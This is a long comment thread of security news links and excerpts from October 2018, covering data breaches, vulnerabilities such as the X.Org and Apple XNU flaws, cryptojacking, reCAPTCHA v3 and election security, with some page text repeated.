Exposed Docker APIs continue to be used by attackers to create new containers that perform cryptojacking.
Earlier this year we reported on attackers utilizing insecure Docker and Kubernetes systems to deploy containers that were used to mine coins. For those who are not familiar with containers, they are packages that contain an application and all the dependencies that are required to run it. These packages can then be deployed as containers to Docker or Kubernetes systems as needed.
In our annual roundup report for 2017, we found that the most common file types used in malware-related spam campaigns are .XLS, .PDF, .JS, .VBS, .DOCX, .DOC, .WSF, .XLSX, .EXE, and .HTML. But cybercriminals are expanding the file types they abuse. The following details how cybercriminals make use of old file types in brand-new ways, proving that they are regularly experimenting to evade spam filters.
Cathay Pacific, Hong Kong’s flag carrier, announced that they’d discovered a cyber-breach affecting millions of their customers.
The sensitive information of nearly 10 million people might have been accessed by cybercriminals. According to the Asian airline operator, hackers might have stolen personal records that include name; nationality; date of birth; phone number; passport number; credit card numbers; email; address; customer service remarks and historical travel information. According to CNN Business, the data leak included approximately 860,000 passport numbers and roughly 250,000 identity card numbers. Cathay might be based in Asia but serves multiple countries across four continents, and the victims include US residents.
Google on Monday announced the launch of reCAPTCHA v3, which aims to improve user experience by removing the need for challenges.
reCAPTCHA is the security service provided by Google for protecting websites from spam and abuse. reCAPTCHA v1 asked every user to read a distorted text and enter it into a box. The second version has brought significant improvements as it leverages various other types of data to determine if a request comes from a bot or a human, allowing many users to access content simply by ticking a box.
With reCAPTCHA v3, Google is making user experience even more frictionless by running adaptive risk analysis in the background and providing a score that tells website owners how suspicious an interaction is.
It was the kind of security lapse that gives election officials nightmares. In 2017, a private contractor left data on Chicago’s 1.8 million registered voters — including addresses, birth dates and partial Social Security numbers — publicly exposed for months on an Amazon cloud server.
Later, at a tense hearing , Chicago’s Board of Elections dressed down the top three executives of Election Systems & Software, the nation’s dominant supplier of election equipment and services.
The three shifted uneasily on folding chairs as board members grilled them about what went wrong. ES&S CEO Tom Burt apologized and repeatedly stressed that there was no evidence hackers downloaded the data.
The Chicago lapse provided a rare moment of public accountability for the closely held businesses that have come to serve as front-line guardians of U.S. election security.
A trio of companies — ES&S of Omaha, Nebraska; Dominion Voting Systems of Denver and Hart InterCivic of Austin, Texas — sell and service more than 90 percent of the machinery on which votes are cast and results tabulated. Experts say they have long skimped on security in favor of convenience, making it more difficult to detect intrusions such as occurred in Russia’s 2016 election meddling.
Several Unix-like operating systems are affected by a potentially serious X.Org vulnerability that can be exploited for privilege escalation and arbitrary code execution
Narendra Shinde discovered that X.Org X Server versions 1.19 and later are affected by an arbitrary file overwrite vulnerability that can be exploited by an authenticated attacker to elevate permissions and execute arbitrary code with root privileges.
The security hole, tracked as CVE-2018-14665, was introduced nearly two years ago and it affects operating systems that run X Server with elevated privileges.
“Incorrect command-line parameter validation in the Xorg X server can lead to privilege elevation and/or arbitrary files overwrite, when the X server is running with elevated privileges (ie when Xorg is installed with the setuid bit set and started by a non-root user),” X.Org developers said in an advisory.
Microsoft Office is impacted by a logical bug that allows an attacker to abuse the “online video” feature in Word to execute malicious code, Cymulate security researchers warn.
The issue, which supposedly impacts all users of Office 2016 and older, can be exploited without special configuration, the security researchers say. Furthermore, no security warning is presented to the user when a malicious document abusing the flaw is opened.
The average business has around 14 improperly configured IaaS instances running at any given time and roughly one in every 20 AWS S3 buckets are left wide open to the public internet.
Cybersecurity awareness month wraps up this week in Europe and the U.S., and it’s the perfect time to reiterate that digital transformation will only succeed if people and organizations can rely on the security of data and connected systems. Digitization and cybersecurity must progress in close association.
Security providers are responsible not only for innovating and implementing solutions, but also for building digital trust. Earlier this year, we saw the start of an initiative with great potential to make our digital world more secure and increase trust. This Charter of Trust brings together companies and players from a variety of industries to work with governments to “establish a reliable basis upon which confidence in a networked, digital world can take root and grow.”
Friday, the Librarian of Congress and U.S. Copyright Office renewed several key exemptions (and added a few new ones) to the Digital Millennium Copyright Act. This go round, they’ve extended some essential exemptions ensuring that computer security researchers won’t be treated like nefarious criminals for their contributions to society.
Trend Micro warns the lack of cybersecurity skills in cryptocurrency environments could be dangerous for firms
Demand for skills in cryptocurrencies is growing, but security expertise isn’t keeping up, leaving businesses open to attack, a report by Trend Micro has revealed.
In the cryptocurrency world, businesses are seeking employees with a knowledge of blockchain, finance, Java, bitcoin and Javascript, but crucially missing from the list is cybersecurity knowledge.
A U.S. government network was infected with malware thanks to one employee’s “extensive history” of watching porn on his work computer, investigators have found.
The audit, carried out by the U.S. Department of the Interior’s inspector general, found that a U.S. Geological Survey (USGS) network at the EROS Center, a satellite imaging facility in South Dakota, was infected after an unnamed employee visited thousands of porn pages that contained malware, which downloaded to his laptop and “exploited the USGS’ network.” Investigators found that many of the porn images were “subsequently saved to an unauthorized USB device and personal Android cell phone,” which was connected to the employee’s government-issued computer.
Investigators found that his Android cell phone “was also infected with malware.”
The findings were made public in a report earlier this month but buried on the U.S. government’s oversight website and went largely unreported.
as a service to the public we asked people passing by our theater today what password they use to protect their personal information. Did they tell us? Watch to find out!
Masquerading is a technique used in which a file name is maliciously named something similar to one which may be trusted.
This specific technique is outlined in detail in the MITRE ATT&CK framework, as well. For example, a file named explorer.exe may seem more benign than one called explor3r.exe.
Search
COUNTRIES
OUR ACTIONS
GET INVOLVED
Helping journalists
Who are we?
Switch langEN
MAKE A DONATION
NEWS
October 29, 2018
EU: Leak reveals states are ready to put human rights defenders at risk to protect surveillance industry
ORGANISATION
RSF_en
EU member states must back proposed curbs on the export of surveillance equipment to abusive regimes, Access Now, Amnesty International, and Reporters Without Borders said, after leaked documents revealed that several EU countries, particularly Sweden and Finland, are pushing for weakening human rights protections in relation to European export controls of surveillance technology. The leaked documents were published earlier today by digital rights reporters at netzpolitik.org and Reporters Without Borders.
After months of work, a set of guidelines designed to protect humanity from a range of threats posed by artificial intelligence have been proposed.
Now, a privacy group wants the U.S. government to adopt them too.
The set of 12 universal guidelines revealed at a meeting in Brussels last week are designed to “inform and improve the design and use of AI” by maximizing the benefits while reducing the risks. AI has been for years a blanket term for machine-based decision making, but as the technology gets better and are more widely adopted, the results of AI-based outcomes are having a greater effect on human lives — from gaining credit, employment, and even to criminal sentencing.
Radisson Hotel Group has told members of its loyalty scheme that their personal details were exposed in a data breach.
The mail sent by the group stated:
This data security incident did not compromise any credit card or password information. Our ongoing investigation has determined that the information accessed was restricted to member name, address (including country of residence), email address, and in some cases, company name, phone number, Radisson Rewards member number and any frequent flier numbers on file.
The breach affected a “small percentage” of the Radisson Rewards members, the email stated, but didn’t provide any specifics about numbers.
Earlier this year the Speck encryption algorithm was added to the Linux kernel as at the time Google intended to use it for EXT4/fscrypt file-system encryption with low-end Android devices. But Speck with all its controversy due to being developed by the US National Security Agency (NSA) led to immediate backlash. The removal of Speck from the Linux kernel tree is finally happening.
Google decided in August they wouldn’t use Speck as planned but rather work on the new HPolyC crypto code for use in future Android Go devices. Following that was the call to remove Speck from the Linux kernel with no real users of the code, but that didn’t happen for the Linux 4.19 cycle.
A 43-second loss of connectivity on the US East Coast helped trigger GitHub’s 24-hour TITSUP (Total Inability To Support User Pulls) earlier this month.
The bit bucket today published a detailed analysis of the outage, and explained that the brief loss of connectivity between its US East Coast network hub and the primary US East Coast data centre left it with an inconsistency between two MySQL databases.
The TITSUP began with planned maintenance work, GitHub’s head of technology Jason Warner explained, to “replace failing 100G optical equipment”.
Security advocate Jerry Gamblin has posted a set of instructions – essentially basic lines of XML – that can easily pull important information off of the Google Home Hub and, in some cases, temporarily brick the device.
The Home Hub, which is essentially an Android tablet attached to a speaker, is designed to act as an in-room Google Assistant.
Salvador Rodriguez / CNBC:NEW
Facebook says it will move Workplace by Facebook, its Slack rival, to its own domain in 2019, Workplace.com, to appease businesses’ fears about data security — – Workplace by Facebook, the company’s enterprise business, is moving onto a website domain separate from Facebook.com in an effort …
Workplace by Facebook, the company’s enterprise business, is moving onto a website domain separate from Facebook.com in an effort to build trust with customers and build its brand.
The Workplace by Facebook unit informed Walmart, a top customer, of the domain change the day Facebook disclosed a security breach that impacted millions of consumers.
Workplace by Facebook expects to begin using the new domain for its customers in 2019.
Zack Whittaker / TechCrunch:
Audit finds a US Geological Survey network in South Dakota was infected with malware after an unnamed employee visited thousands of porn pages on his laptop
A U.S. government network was infected with malware thanks to one employee’s “extensive history” of watching porn on his work computer, investigators have found.
The audit, carried out by the U.S. Department of the Interior’s inspector general, found that a U.S. Geological Survey (USGS) network at the EROS Center, a satellite imaging facility in South Dakota, was infected after an unnamed employee visited thousands of porn pages that contained malware, which downloaded to his laptop and “exploited the USGS’ network.” Investigators found that many of the porn images were “subsequently saved to an unauthorized USB device and personal Android cell phone,” which was connected to the employee’s government-issued computer.
Investigators found that his Android cell phone “was also infected with malware.”
This post is about a heap buffer overflow vulnerability which I found in Apple’s XNU operating system kernel. I have written a proof-of-concept exploit which can reboot any Mac or iOS device on the same network, without any user interaction. Apple have classified this vulnerability as a remote code execution vulnerability in the kernel, because it may be possible to exploit the buffer overflow to execute arbitrary code in the kernel.
The following operating system versions and devices are vulnerable:
Apple iOS 11 and earlier: all devices (upgrade to iOS 12)
Apple macOS High Sierra, up to and including 10.13.6: all devices (patched in security update 2018-001)
Apple macOS Sierra, up to and including 10.12.6: all devices (patched in security update 2018-005)
Apple OS X El Capitan and earlier: all devices
The desktop variant for Telegram secure messaging app fails to protect chat content locally and offers access to plain text conversations and media that otherwise travel encrypted.
Telegram’s focus on providing secure communication is well known. The app uses encryption to ensure that a third party cannot read the conversations on their way to the destination.
A feature called ‘secret chats’ is available for those that want complete privacy for their communication, by using end-to-end encryption to guarantee that only the sender and the receiver can access the contents.
A security researcher has demonstrated how he could hide the Complete Works of Shakespeare into an image and use Twitter to distribute it using Steganography.
Steganography is the act of hiding information or messages inside objects that are not themselves secret. This allows people to covertly distribute messages, files, and other types of data in files or data that appear to be non-secretive in nature.
In a recent experiment, security researcher Dаvіd Вucһаnаn created a JPEG image of Shakespeare that also included a RARed copy of his complete works in HTML format. Buchanan went on to further show that this image could also be uploaded to Twitter, which would create a thumbnail that continued to contain the embedded RAR file.
We use cookies to ensure that we give you the best experience on our website. If you continue to use this site we will assume that you are happy with it.
We are a professional review site that has advertisement and can receive compensation from the companies whose products we review. We use affiliate links in the post so if you use them to buy products through those links we can get compensation at no additional cost to you.OkDecline
495 Comments
Tomi Engdahl says:
Exposed Docker APIs Continue to Be Used for Cryptojacking
https://www.bleepingcomputer.com/news/security/exposed-docker-apis-continue-to-be-used-for-cryptojacking/
Exposed Docker APIs continue to be used by attackers to create new containers that perform cryptojacking.
Earlier this year we reported on attackers utilizing insecure Docker and Kubernetes systems to deploy containers that were used to mine coins. For those who are not familiar with containers, they are packages that contain an application and all the dependencies that are required to run it. These packages can then be deployed as containers to Docker or Kubernetes systems as needed.
Tomi Engdahl says:
Windows 10:stä paljastui urkinnan mahdollistava aukko – näin tarkistat, onko koneesi turvassa
https://www.is.fi/digitoday/tietoturva/art-2000005881077.html
Tomi Engdahl says:
Security Tip (ST18-005)
Proper Disposal of Electronic Devices
https://www.us-cert.gov/ncas/tips/18-005
Tomi Engdahl says:
Windows Defender Antivirus can now run in a sandbox
https://cloudblogs.microsoft.com/microsoftsecure/2018/10/26/windows-defender-antivirus-can-now-run-in-a-sandbox/
Tomi Engdahl says:
Same Old yet Brand-new: New File Types Emerge in Malware Spam Attachments
https://blog.trendmicro.com/trendlabs-security-intelligence/same-old-yet-brand-new-new-file-types-emerge-in-malware-spam-attachments/
In our annual roundup report for 2017, we found that the most common file types used in malware-related spam campaigns are .XLS, .PDF, .JS, .VBS, .DOCX, .DOC, .WSF, .XLSX, .EXE, and .HTML. But cybercriminals are expanding the file types they abuse. The following details how cybercriminals make use of old file types in brand-new ways, proving that they are regularly experimenting to evade spam filters.
.ARJ and .Z files
.PDF Files
.IQY Files
.PUB
SettingContents-ms
Tomi Engdahl says:
Cathay Pacific Suffers World’s Largest Airline Data Breach
https://www.pandasecurity.com/mediacenter/news/cathay-pacific-data-breach/
Cathay Pacific, Hong Kong’s flag carrier, announced that they’d discovered a cyber-breach affecting millions of their customers.
The sensitive information of nearly 10 million people might have been accessed by cybercriminals. According to the Asian airline operator, hackers might have stolen personal records that include name; nationality; date of birth; phone number; passport number; credit card numbers; email; address; customer service remarks and historical travel information. According to CNN Business, the data leak included approximately 860,000 passport numbers and roughly 250,000 identity card numbers. Cathay might be based in Asia but serves multiple countries across four continents, and the victims include US residents.
Tomi Engdahl says:
Your Account is hacked, scam (10-22-19)
https://phishing.vcu.edu/2018/10/22/
Tomi Engdahl says:
https://www.tekniikkatalous.fi/talous_uutiset/yritykset/sahkoposti-harrastuskerhon-vetajalta-kyberrosvot-valmistautuvat-jo-todella-hyvin-keikkoihinsa-pystyy-jopa-tappamaan-6746737
Tomi Engdahl says:
China systematically hijacks internet traffic: researchers
https://www.itnews.com.au/news/china-systematically-hijacks-internet-traffic-researchers-514537
Tomi Engdahl says:
Google Launches reCAPTCHA v3
https://www.securityweek.com/google-launches-recaptcha-v3
Google on Monday announced the launch of reCAPTCHA v3, which aims to improve user experience by removing the need for challenges.
reCAPTCHA is the security service provided by Google for protecting websites from spam and abuse. reCAPTCHA v1 asked every user to read a distorted text and enter it into a box. The second version has brought significant improvements as it leverages various other types of data to determine if a request comes from a bot or a human, allowing many users to access content simply by ticking a box.
With reCAPTCHA v3, Google is making user experience even more frictionless by running adaptive risk analysis in the background and providing a score that tells website owners how suspicious an interaction is.
Tomi Engdahl says:
US Election Integrity Depends on Security-Challenged Firms
https://www.securityweek.com/us-election-integrity-depends-security-challenged-firms
It was the kind of security lapse that gives election officials nightmares. In 2017, a private contractor left data on Chicago’s 1.8 million registered voters — including addresses, birth dates and partial Social Security numbers — publicly exposed for months on an Amazon cloud server.
Later, at a tense hearing , Chicago’s Board of Elections dressed down the top three executives of Election Systems & Software, the nation’s dominant supplier of election equipment and services.
The three shifted uneasily on folding chairs as board members grilled them about what went wrong. ES&S CEO Tom Burt apologized and repeatedly stressed that there was no evidence hackers downloaded the data.
The Chicago lapse provided a rare moment of public accountability for the closely held businesses that have come to serve as front-line guardians of U.S. election security.
A trio of companies — ES&S of Omaha, Nebraska; Dominion Voting Systems of Denver and Hart InterCivic of Austin, Texas — sell and service more than 90 percent of the machinery on which votes are cast and results tabulated. Experts say they have long skimped on security in favor of convenience, making it more difficult to detect intrusions such as occurred in Russia’s 2016 election meddling.
Tomi Engdahl says:
X.Org Flaw Exposes Unix-Like OSes to Attacks
https://www.securityweek.com/xorg-flaw-exposes-unix-oses-attacks
Several Unix-like operating systems are affected by a potentially serious X.Org vulnerability that can be exploited for privilege escalation and arbitrary code execution
Narendra Shinde discovered that X.Org X Server versions 1.19 and later are affected by an arbitrary file overwrite vulnerability that can be exploited by an authenticated attacker to elevate permissions and execute arbitrary code with root privileges.
The security hole, tracked as CVE-2018-14665, was introduced nearly two years ago and it affects operating systems that run X Server with elevated privileges.
“Incorrect command-line parameter validation in the Xorg X server can lead to privilege elevation and/or arbitrary files overwrite, when the X server is running with elevated privileges (ie when Xorg is installed with the setuid bit set and started by a non-root user),” X.Org developers said in an advisory.
Tomi Engdahl says:
‘DemonBot’ Botnet Targets Hadoop Servers
https://www.securityweek.com/%E2%80%98demonbot-botnet-targets-hadoop-servers
Tomi Engdahl says:
Logical Bug in Microsoft Word’s ‘Online Video’ Allows Code Execution
https://www.securityweek.com/logical-bug-microsoft-words-online-video-allows-code-execution
Microsoft Office is impacted by a logical bug that allows an attacker to abuse the “online video” feature in Word to execute malicious code, Cymulate security researchers warn.
The issue, which supposedly impacts all users of Office 2016 and older, can be exploited without special configuration, the security researchers say. Furthermore, no security warning is presented to the user when a malicious document abusing the flaw is opened.
Tomi Engdahl says:
https://www.wired.com/story/signal-sealed-sender-encrypted-messaging/
Tomi Engdahl says:
McAfee says cloud security not as bad as we feared… it’s much worse
Quick takeaway: most everyone sucks at IaaS
https://www.theregister.co.uk/2018/10/30/mcafee_cloud_security_terrible/
The average business has around 14 improperly configured IaaS instances running at any given time and roughly one in every 20 AWS S3 buckets are left wide open to the public internet.
Tomi Engdahl says:
Strengthening Industry Collaboration Through the Charter of Trust for a Secure Digital World
https://securityintelligence.com/strengthening-industry-collaboration-through-the-charter-of-trust-for-a-secure-digital-world/
Cybersecurity awareness month wraps up this week in Europe and the U.S., and it’s the perfect time to reiterate that digital transformation will only succeed if people and organizations can rely on the security of data and connected systems. Digitization and cybersecurity must progress in close association.
Security providers are responsible not only for innovating and implementing solutions, but also for building digital trust. Earlier this year, we saw the start of an initiative with great potential to make our digital world more secure and increase trust. This Charter of Trust brings together companies and players from a variety of industries to work with governments to “establish a reliable basis upon which confidence in a networked, digital world can take root and grow.”
Tomi Engdahl says:
Feds Expand Security Researchers’ Ability To Hack Without Going To Jail
https://yro.slashdot.org/story/18/10/29/236237/feds-expand-security-researchers-ability-to-hack-without-going-to-jail?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+Slashdot%2Fslashdot%2Fto+%28%28Title%29Slashdot+%28rdf%29%29
Friday, the Librarian of Congress and U.S. Copyright Office renewed several key exemptions (and added a few new ones) to the Digital Millennium Copyright Act. This go round, they’ve extended some essential exemptions ensuring that computer security researchers won’t be treated like nefarious criminals for their contributions to society.
Feds Expand Security Researchers’ Ability to Hack Without Going to Jail
https://motherboard.vice.com/en_us/article/pa9jbg/feds-expand-security-researchers-ability-to-hack-without-going-to-jail
“No researcher wants to end up in jail for discovering a vulnerability.”
Tomi Engdahl says:
Demand for cryptocurrency skills surges, but lacks cyber security expertise
http://www.itpro.co.uk/business-strategy/careers-training/32230/demand-for-cryptocurrency-skills-surges-but-lacks-cyber
Trend Micro warns the lack of cybersecurity skills in cryptocurrency environments could be dangerous for firms
Demand for skills in cryptocurrencies is growing, but security expertise isn’t keeping up, leaving businesses open to attack, a report by Trend Micro has revealed.
In the cryptocurrency world, businesses are seeking employees with a knowledge of blockchain, finance, Java, bitcoin and Javascript, but crucially missing from the list is cybersecurity knowledge.
Tomi Engdahl says:
Civil servant who watched porn at work blamed for infecting a US government network with malware
https://techcrunch.com/2018/10/29/porn-sites-blamed-after-government-network-infected-malware/
A U.S. government network was infected with malware thanks to one employee’s “extensive history” of watching porn on his work computer, investigators have found.
The audit, carried out by the U.S. Department of the Interior’s inspector general, found that a U.S. Geological Survey (USGS) network at the EROS Center, a satellite imaging facility in South Dakota, was infected after an unnamed employee visited thousands of porn pages that contained malware, which downloaded to his laptop and “exploited the USGS’ network.” Investigators found that many of the porn images were “subsequently saved to an unauthorized USB device and personal Android cell phone,” which was connected to the employee’s government-issued computer.
Investigators found that his Android cell phone “was also infected with malware.”
The findings were made public in a report earlier this month but buried on the U.S. government’s oversight website and went largely unreported.
Tomi Engdahl says:
Jimmy Kimmel Live
https://m.youtube.com/watch?feature=youtu.be&v=UzvPP6_LRHc
as a service to the public we asked people passing by our theater today what password they use to protect their personal information. Did they tell us? Watch to find out!
Tomi Engdahl says:
The Masquerade Ball: Train Yourself to Detect Spoofed Files
https://www.tripwire.com/state-of-security/security-data-protection/masquerade-train-yourself-detect-spoofed-files/
Masquerading is a technique used in which a file name is maliciously named something similar to one which may be trusted.
This specific technique is outlined in detail in the MITRE ATT&CK framework, as well. For example, a file named explorer.exe may seem more benign than one called explor3r.exe.
Tomi Engdahl says:
EU: Leak reveals states are ready to put human rights defenders at risk to protect surveillance industry
https://rsf.org/en/news/eu-leak-reveals-states-are-ready-put-human-rights-defenders-risk-protect-surveillance-industry
Search
Search
COUNTRIES
OUR ACTIONS
GET INVOLVED
Helping journalists
Who are we?
Switch langEN
MAKE A DONATION
NEWS
October 29, 2018
EU: Leak reveals states are ready to put human rights defenders at risk to protect surveillance industry
ORGANISATION
RSF_en
EU member states must back proposed curbs on the export of surveillance equipment to abusive regimes, Access Now, Amnesty International, and Reporters Without Borders said, after leaked documents revealed that several EU countries, particularly Sweden and Finland, are pushing for weakening human rights protections in relation to European export controls of surveillance technology. The leaked documents were published earlier today by digital rights reporters at netzpolitik.org and Reporters Without Borders.
Tomi Engdahl says:
Privacy group calls on U.S. government to adopt universal AI guidelines to protect safety, security and civil liberties
https://techcrunch.com/2018/10/29/us-government-universal-artificial-intelligence-guidelines/?sr_share=facebook&utm_source=tcfbpage
After months of work, a set of guidelines designed to protect humanity from a range of threats posed by artificial intelligence have been proposed.
Now, a privacy group wants the U.S. government to adopt them too.
The set of 12 universal guidelines revealed at a meeting in Brussels last week are designed to “inform and improve the design and use of AI” by maximizing the benefits while reducing the risks. AI has been for years a blanket term for machine-based decision making, but as the technology gets better and are more widely adopted, the results of AI-based outcomes are having a greater effect on human lives — from gaining credit, employment, and even to criminal sentencing.
Tomi Engdahl says:
New iPhone Passcode Bypass Found Hours After Apple Releases iOS 12.1
https://thehackernews.com/2018/10/iphone-ios-passcode-bypass.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+TheHackersNews+%28The+Hackers+News+-+Security+Blog%29&utm_content=FaceBook&m=1
Tomi Engdahl says:
Hard disk hacking: Injecting Code
http://spritesmods.com/?art=hddhack&page=4
Tomi Engdahl says:
Radisson Hotel Group ‘fesses up to ‘security incident’
Loyalty card members deets exposed
https://www.theregister.co.uk/2018/10/31/radisson_hotel_group_fesses_up_to_security_incident/
Radisson Hotel Group has told members of its loyalty scheme that their personal details were exposed in a data breach.
The mail sent by the group stated:
This data security incident did not compromise any credit card or password information. Our ongoing investigation has determined that the information accessed was restricted to member name, address (including country of residence), email address, and in some cases, company name, phone number, Radisson Rewards member number and any frequent flier numbers on file.
The breach affected a “small percentage” of the Radisson Rewards members, the email stated, but didn’t provide any specifics about numbers.
Tomi Engdahl says:
https://www.tivi.fi/Kaikki_uutiset/android-puhelimien-sovellukset-lahettavat-kayttajadataa-jopa-20-taholle-katso-mihin-suomalaisten-suosikkisovellukset-lahettavat-dataa-6747250
Tomi Engdahl says:
The Linux Kernel’s Speck Death Sentence Finally Being Carried Out
https://www.phoronix.com/scan.php?page=news_item&px=Linux-Kernel-Die-Speck-Die
Earlier this year the Speck encryption algorithm was added to the Linux kernel as at the time Google intended to use it for EXT4/fscrypt file-system encryption with low-end Android devices. But Speck with all its controversy due to being developed by the US National Security Agency (NSA) led to immediate backlash. The removal of Speck from the Linux kernel tree is finally happening.
Google decided in August they wouldn’t use Speck as planned but rather work on the new HPolyC crypto code for use in future Android Go devices. Following that was the call to remove Speck from the Linux kernel with no real users of the code, but that didn’t happen for the Linux 4.19 cycle.
Tomi Engdahl says:
GitHub lost a network link for 43 seconds, went TITSUP for a day
Database replication is hard
https://www.theregister.co.uk/2018/10/31/github_lost_a_network_link_for_43_seconds_went_titsup_for_a_day/
A 43-second loss of connectivity on the US East Coast helped trigger GitHub’s 24-hour TITSUP (Total Inability To Support User Pulls) earlier this month.
The bit bucket today published a detailed analysis of the outage, and explained that the brief loss of connectivity between its US East Coast network hub and the primary US East Coast data centre left it with an inconsistency between two MySQL databases.
The TITSUP began with planned maintenance work, GitHub’s head of technology Jason Warner explained, to “replace failing 100G optical equipment”.
Tomi Engdahl says:
50 ways to leave your lover, but four to sniff browser history
Vulnerabilities that expose browsing history yet to be fixed
https://www.theregister.co.uk/2018/10/31/web_browsers_privacy/
“History sniffing” promises a nose full of dust or, you’re talking about web browsers, a whiff of the websites you’ve visited.
Tomi Engdahl says:
Google Launches reCAPTCHA v3
https://www.securityweek.com/google-launches-recaptcha-v3
https://security.googleblog.com/2018/10/introducing-recaptcha-v3-new-way-to.html
Tomi Engdahl says:
US Election Integrity Depends on Security-Challenged Firms
https://www.securityweek.com/us-election-integrity-depends-security-challenged-firms
Tomi Engdahl says:
Pain in the brain! Kaspersky warns of hackable brain implants
That furious clicking you hear is Charlie Brooker frantically writing his next script
https://www.theregister.co.uk/2018/10/29/hacked_brain_implants/
Tomi Engdahl says:
Civil servant who watched porn at work blamed for infecting a US government network with malware
https://techcrunch.com/2018/10/29/porn-sites-blamed-after-government-network-infected-malware/
Tomi Engdahl says:
The Google Home Hub is deeply insecure
https://techcrunch.com/2018/10/31/the-google-home-hub-is-deeply-insecure/?sr_share=facebook&utm_source=tcfbpage
Security advocate Jerry Gamblin has posted a set of instructions – essentially basic lines of XML – that can easily pull important information off of the Google Home Hub and, in some cases, temporarily brick the device.
The Home Hub, which is essentially an Android tablet attached to a speaker, is designed to act as an in-room Google Assistant.
Tomi Engdahl says:
Salvador Rodriguez / CNBC:NEW
Facebook says it will move Workplace by Facebook, its Slack rival, to its own domain in 2019, Workplace.com, to appease businesses’ fears about data security — – Workplace by Facebook, the company’s enterprise business, is moving onto a website domain separate from Facebook.com in an effort …
Facebook is separating Workplace from the main Facebook site to appease business customers concerned about security
https://www.cnbc.com/2018/10/31/facebook-introduces-workplace-domain-to-calm-enterprise-security-fears.html
Workplace by Facebook, the company’s enterprise business, is moving onto a website domain separate from Facebook.com in an effort to build trust with customers and build its brand.
The Workplace by Facebook unit informed Walmart, a top customer, of the domain change the day Facebook disclosed a security breach that impacted millions of consumers.
Workplace by Facebook expects to begin using the new domain for its customers in 2019.
Tomi Engdahl says:
Zack Whittaker / TechCrunch:
Audit finds a US Geological Survey network in South Dakota was infected with malware after an unnamed employee visited thousands of porn pages on his laptop
Civil servant who watched porn at work blamed for infecting a US government network with malware
https://techcrunch.com/2018/10/29/porn-sites-blamed-after-government-network-infected-malware/
A U.S. government network was infected with malware thanks to one employee’s “extensive history” of watching porn on his work computer, investigators have found.
The audit, carried out by the U.S. Department of the Interior’s inspector general, found that a U.S. Geological Survey (USGS) network at the EROS Center, a satellite imaging facility in South Dakota, was infected after an unnamed employee visited thousands of porn pages that contained malware, which downloaded to his laptop and “exploited the USGS’ network.” Investigators found that many of the porn images were “subsequently saved to an unauthorized USB device and personal Android cell phone,” which was connected to the employee’s government-issued computer.
Investigators found that his Android cell phone “was also infected with malware.”
Tomi Engdahl says:
Return of the Ping of Death
Kernel RCE caused by buffer overflow in Apple’s ICMP packet-handling code (CVE-2018-4407)
https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407
This post is about a heap buffer overflow vulnerability which I found in Apple’s XNU operating system kernel. I have written a proof-of-concept exploit which can reboot any Mac or iOS device on the same network, without any user interaction. Apple have classified this vulnerability as a remote code execution vulnerability in the kernel, because it may be possible to exploit the buffer overflow to execute arbitrary code in the kernel.
The following operating system versions and devices are vulnerable:
Apple iOS 11 and earlier: all devices (upgrade to iOS 12)
Apple macOS High Sierra, up to and including 10.13.6: all devices (patched in security update 2018-001)
Apple macOS Sierra, up to and including 10.12.6: all devices (patched in security update 2018-005)
Apple OS X El Capitan and earlier: all devices
Tomi Engdahl says:
50 ways to leave your lover, but four to sniff browser history
Vulnerabilities that expose browsing history yet to be fixed
https://www.theregister.co.uk/2018/10/31/web_browsers_privacy/
Tomi Engdahl says:
Check this out: Radisson Hotel Group ‘fesses up to ‘security incident’
Loyalty card members deets exposed
https://www.theregister.co.uk/2018/10/31/radisson_hotel_group_fesses_up_to_security_incident/
Tomi Engdahl says:
Telegram Desktop Saves Conversations Locally in Plain Text
https://www.bleepingcomputer.com/news/security/telegram-desktop-saves-conversations-locally-in-plain-text/
The desktop variant for Telegram secure messaging app fails to protect chat content locally and offers access to plain text conversations and media that otherwise travel encrypted.
Telegram’s focus on providing secure communication is well known. The app uses encryption to ensure that a third party cannot read the conversations on their way to the destination.
A feature called ‘secret chats’ is available for those that want complete privacy for their communication, by using end-to-end encryption to guarantee that only the sender and the receiver can access the contents.
Tomi Engdahl says:
Complete Works Of Shakespeare Hidden Inside Twitter Thumbnail Image
https://www.bleepingcomputer.com/news/security/complete-works-of-shakespeare-hidden-inside-twitter-thumbnail-image/
A security researcher has demonstrated how he could hide the Complete Works of Shakespeare into an image and use Twitter to distribute it using Steganography.
Steganography is the act of hiding information or messages inside objects that are not themselves secret. This allows people to covertly distribute messages, files, and other types of data in files or data that appear to be non-secretive in nature.
In a recent experiment, security researcher Dаvіd Вucһаnаn created a JPEG image of Shakespeare that also included a RARed copy of his complete works in HTML format. Buchanan went on to further show that this image could also be uploaded to Twitter, which would create a thumbnail that continued to contain the embedded RAR file.
Tomi Engdahl says:
Emotet Trojan Begins Stealing Victim’s Email Using New Module
https://www.bleepingcomputer.com/news/security/emotet-trojan-begins-stealing-victims-email-using-new-module/
Tomi Engdahl says:
https://www.tivi.fi/Kaikki_uutiset/f-secure-ja-elisa-kehittavat-iot-ajan-reititinta-lupaa-suojaa-vaikka-valmistaja-ei-ole-tietoturvaa-edes-miettinyt-6746856